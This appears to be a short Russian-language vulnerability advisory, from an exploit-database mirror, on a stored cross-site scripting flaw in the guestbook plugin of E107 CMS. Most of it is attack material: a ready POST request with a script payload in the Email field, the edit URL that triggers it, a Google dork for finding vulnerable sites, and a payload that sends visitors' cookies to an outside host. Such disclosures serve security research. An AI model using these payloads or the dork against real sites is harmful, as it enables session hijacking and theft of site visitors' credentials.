Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:21375
HistoryFeb 23, 2009 - 12:00 a.m.

E107 CMS (e107_plugins/guestbook) stored XSS

2009-02-2300:00:00
vulners.com
84

Фильтрация отсутствует в поле "Email", POST запрос:
POSTDATA=name=1&email='/>"<script>alert('xss')</script>&url=http%3A%2F%2F&comment=4&guestbook_submit=Si%C5%B3sti
Далее следует редактирование сообщения. http://Target/e107_plugins/guestbook/guestbook.php?edit.номер вашего сообщения
Example: http://Target/e107_plugins/guestbook/guestbook.php?edit.2
XSS vector: '/>"<script>alert('xss')</script>
Google dork: inurl:/e107_plugins/guestbook/guestbook.php
Cookie:
'/>"<script>img = new Image(); img.src = "http://someshit.net/image/s.gif?&quot;+document.cookie;&lt;/script&gt;